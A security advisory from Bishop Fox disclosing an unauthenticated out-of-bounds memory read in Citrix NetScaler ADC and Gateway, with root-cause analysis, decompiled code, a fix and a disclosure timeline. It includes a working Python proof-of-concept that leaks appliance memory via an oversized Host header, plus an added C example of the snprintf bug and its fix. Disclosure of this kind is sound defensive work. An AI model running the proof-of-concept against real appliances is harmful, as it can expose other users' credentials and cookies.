URL: https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory
Blog // Advisories // May 06, 2024


NETSCALER ADC AND GATEWAY, VERSION 13.1-50.23

By: Bishop Fox, Security Experts



PRODUCT VENDOR

Cloud Software Group


PRODUCT DESCRIPTION

The affected Citrix NetScaler components are used for Authentication,
Authorization, and Auditing (AAA), and remote access. The latest version of
NetScaler is 14.1-21.15, released on April 23, 2024.


VULNERABILITIES LIST

One vulnerability was identified within Citrix NetScaler ADC and Gateway:

 * Out-of-bounds memory read

This vulnerability is described in the following sections.


AFFECTED VERSION

Version 13.1-50.23


SUMMARY OF FINDINGS

The vulnerability would enable an attacker to remotely obtain sensitive
information from a NetScaler appliance configured as a Gateway or AAA virtual
server via a commonly exposed web interface, without requiring authentication.
This bug is nearly identical to the Citrix Bleed vulnerability (CVE-2023-4966),
except it is less likely to return highly sensitive information to an attacker.


IMPACT

The vulnerability allows an attacker to recover potentially sensitive data from
memory. Although in most cases nothing of value is returned, we have observed
instances where POST request bodies are leaked. These POST requests may contain
credentials or cookies.


SOLUTION

Update to version 13.1-51.15 or later


OUT-OF-BOUNDS MEMORY READ

NetScaler ADC and Gateway products were vulnerable to an unauthenticated
out-of-bounds memory read that could be exploited to capture sensitive
information from the appliance's process memory, including HTTP request bodies.


VULNERABILITY DETAILS

CVE ID: None

Vulnerability Type: Out-Of-Bounds Read

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if
other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒
Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-125 (Out-Of-Bounds Read)

Bishop Fox staff determined that NetScaler ADC and Gateway products were
vulnerable to an unauthenticated out-of-bounds memory read and exploited the
vulnerability to capture sensitive information from the appliance’s process
memory, including HTTP request bodies. This could potentially allow attackers to
obtain credentials submitted by users logging in to NetScaler ADC and Gateway
appliances, or cryptographic material used by the appliance.

Bishop Fox staff determined that the Gateway or AAA virtual server performs
unsafe handling of the HTTP Host request header when handling HTTP GET requests
for the /nf/auth/startwebview.do URI. The vulnerable function attempts to
calculate the length of a string containing the Host header and then directs a
subsequent function to copy a string of that length into an HTTP response
message. However, incorrect use of the C snprintf function results in a length
that exceeds the size of the source buffer, causing unrelated data to be copied
into the response when the Host header value submitted in the request is longer
than approximately 5,394 bytes. Authentication is not required to exploit this
vulnerability.

The following Python proof-of-concept code can be used to demonstrate
exploitability when executed against a vulnerable appliance:

import requests

url = "https://<HOST>/nf/auth/startwebview.do"

# A Host header far longer than the ~5,394-byte threshold makes the appliance's
# snprintf return value exceed its 0x1800-byte response buffer.
r = requests.get(url, headers={"Host": "A" * 0x5000}, verify=False)

# Everything after the first 0x1800 bytes came from beyond the response buffer.
print(r.content[0x1800:])

Figure 1 – Proof-of-concept exploit code

More specifically, requests to the /nf/auth/startwebview.do URI are handled by
the ns_aaa_start_webview_for_authv3 function. The
ns_aaa_start_webview_for_authv3 function constructs an XML response using the
snprintf function and returns this response to the user by calling the
ns_vpn_send_response function, as shown below:

sprintf(print_temp_rule,"%s%.*s%s",proto,iVar5 - (int)host_hdr,host_hdr,
  "/nf/auth/doWebview.do");
length = snprintf(&ns_HttpRedirectPkt,0x1800,
  "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><AuthenticateResponse xmlns=\"http://citrix.com/authentication/response/1\"><Status>success</Status><Result>more-info</Result><StateContext></StateContext><AuthenticationRequirements><PostBack>/nf/auth/webview/done</PostBack><CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack><CancelButtonText>Cancel</CancelButtonText><Requirements><Requirement><Credential><ID>samlResponse</ID><Type>webview</Type><wv:WebView xmlns:wv=\"http://citrix.com/authentication/response/webview/1\"><wv:StartUrl>%.*s</wv:StartUrl></wv:WebView></Credential><Label><Type>none</Type></Label><Input/></Requirement></Requirements></AuthenticationRequirements></AuthenticateResponse>"
  ,length,print_temp_rule);
ns_vpn_send_response(lVar1,0x980200,&ns_HttpRedirectPkt,length);

Figure 2 – Excerpt of decompiled ns_aaa_start_webview_for_authv3 function

The ns_vpn_send_response function sends an HTTP response where the body and size
of the body are provided as parameters. In the code shown above, the size is set
to the return value from the snprintf function. According to the documentation
for the snprintf function, the return value is the number of characters that
would have been written if enough space had been available. Therefore, if the
constructed response would have exceeded the buffer size (0x1800 bytes in this
case), the ns_vpn_send_response function will respond with extra data past the
end of the buffer. This is identical to the underlying cause of CVE-2023-4966
(CitrixBleed).
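To make the snprintf return-value behaviour concrete, the following added C example (not code from the advisory, and not NetScaler's own code) places the vulnerable length computation beside a hardened one. The 0x1800 buffer size is taken from the excerpt above; the XML template is shortened to the single <wv:StartUrl> element, which is why its threshold differs from the ~5,394 bytes the advisory measured against the full template, and the 'A'-filled URL is constructed input standing in for the Host header value.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Buffer size taken from the decompiled excerpt (0x1800 bytes). */
#define RESPONSE_BUF_SIZE 0x1800

/* Shortened stand-in for the XML template: only the element that carries the
 * Host-header-derived URL. The real template is much longer. */
#define XML_PREFIX "<wv:StartUrl>"
#define XML_SUFFIX "</wv:StartUrl>"

/* Vulnerable pattern: hand the raw snprintf return value to the sender.
 * snprintf reports the length the full output WOULD have had, so when the
 * output is truncated this length points past the end of buf. */
static size_t format_len_vulnerable(char *buf, size_t bufsize, const char *url)
{
    int n = snprintf(buf, bufsize, XML_PREFIX "%s" XML_SUFFIX, url);
    return n < 0 ? 0 : (size_t)n;        /* not clamped: may exceed bufsize */
}

/* Hardened pattern: treat truncation as an error. Returns 0 and sets
 * *truncated when the output did not fit, otherwise the bytes written. */
static size_t format_len_fixed(char *buf, size_t bufsize, const char *url,
                               int *truncated)
{
    int n = snprintf(buf, bufsize, XML_PREFIX "%s" XML_SUFFIX, url);
    if (n < 0 || (size_t)n >= bufsize) {
        *truncated = 1;
        buf[0] = '\0';                   /* never send a partial response */
        return 0;
    }
    *truncated = 0;
    return (size_t)n;
}

/* Constructed input: a URL made of host_len 'A' characters, standing in for
 * the Host header value. The caller frees the result. */
static char *make_url(size_t host_len)
{
    char *url = malloc(host_len + 1);
    memset(url, 'A', host_len);
    url[host_len] = '\0';
    return url;
}

/* Bytes beyond the end of the response buffer that the vulnerable sender
 * would transmit for a Host header of host_len bytes (0 when it fits). */
size_t overrun_bytes(size_t host_len)
{
    char buf[RESPONSE_BUF_SIZE];
    char *url = make_url(host_len);
    size_t len = format_len_vulnerable(buf, sizeof buf, url);
    free(url);
    return len > sizeof buf ? len - sizeof buf : 0;
}

/* Length the hardened sender would use; 0 means the request was rejected. */
size_t fixed_length(size_t host_len)
{
    char buf[RESPONSE_BUF_SIZE];
    int truncated;
    char *url = make_url(host_len);
    size_t len = format_len_fixed(buf, sizeof buf, url, &truncated);
    free(url);
    return len;
}

/* 1 if the hardened path rejected the request because the output was truncated. */
int fixed_rejected(size_t host_len)
{
    char buf[RESPONSE_BUF_SIZE];
    int truncated;
    char *url = make_url(host_len);
    format_len_fixed(buf, sizeof buf, url, &truncated);
    free(url);
    return truncated;
}

int main(void)
{
    printf("100-byte Host: vulnerable over-read %zu bytes, fixed length %zu\n",
           overrun_bytes(100), fixed_length(100));
    printf("0x5000-byte Host: vulnerable over-read %zu bytes, fixed rejected=%d\n",
           overrun_bytes(0x5000), fixed_rejected(0x5000));
    return 0;
}
```

The hardened variant is the general fix for this bug class: the value passed to any send or copy routine must be derived from what actually landed in the buffer (or the request rejected on truncation), never from snprintf's return value alone. Checking `n >= bufsize` rather than `n > bufsize` also accounts for the terminating NUL that snprintf reserves.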

The unsafe use of the sprintf function in the ns_aaa_start_webview_for_authv3
function is discussed in more detail in the Insecure String Handling finding of
this report.

Bishop Fox staff analyzed vulnerable Citrix deployments and observed instances
where the disclosed memory contained data from HTTP requests, sometimes
including POST request bodies. For example, the response below includes data
from another HTTP request processed by the appliance, apparently related to a
Nessus vulnerability scan:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <AuthenticateResponse xmlns="http://citrix.com/authentication/response/1">
    <Status>success</Status>
    <Result>more-info</Result>
    <StateContext></StateContext>
    <AuthenticationRequirements>
      <PostBack>/nf/auth/webview/done</PostBack>
      <CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack>
      <CancelButtonText>Cancel</CancelButtonText>
      <Requirements>
        <Requirement>
          <Credential>
          <ID>samlResponse</ID>
          <Type>webview</Type>
          <wv:WebView xmlns:wv="http://citrix.com/authentication/response/webview/1">
          <wv:StartUrl>https://  ...omitted for brevity...

Figure 3 – NetScaler appliance response disclosing memory content

HTTP requests often contain sensitive information that could benefit an
attacker, such as administrators’ credentials.


AFFECTED LOCATIONS

URI

/nf/auth/startwebview.do

Function

ns_aaa_start_webview_for_authv3 in /netscaler/nsppe


CREDITS

 * Capability Development Group at Bishop Fox


TIMELINE

 * 01/22/2024: Initial discovery
 * 01/25/2024: Contact with vendor
 * 02/01/2024: Vendor acknowledged vulnerabilities
 * 02/02/2024: Vendor confirmed that the latest version (13.1-51.15) was
   unaffected
 * 05/06/2024: Vulnerabilities publicly disclosed

--------------------------------------------------------------------------------

About the author, Bishop Fox

Security Experts

Due to the nature in which we conduct research and penetration tests, some of
our security experts prefer to remain anonymous. Their work is published under
our Bishop Fox name.

Bishop Fox is the leading authority in offensive security, providing solutions
ranging from continuous penetration testing, red teaming, and attack surface
management to product, cloud, and application security assessments. We’ve worked
with more than 25% of the Fortune 100, half of the Fortune 10, eight of the top
10 global technology companies, and all of the top global media companies to
improve their security. Our Cosmos platform, service innovation, and culture of
excellence continue to gather accolades from industry award programs including
Fast Company, Inc., SC Media, and others, and our offerings are consistently
ranked as “world class” in customer experience surveys. We’ve been actively
contributing to and supporting the security community for almost two decades and
have published more than 16 open-source tools and 50 security advisories in the
last five years. Learn more at bishopfox.com or follow us on Twitter.

Copyright © 2024 Bishop Fox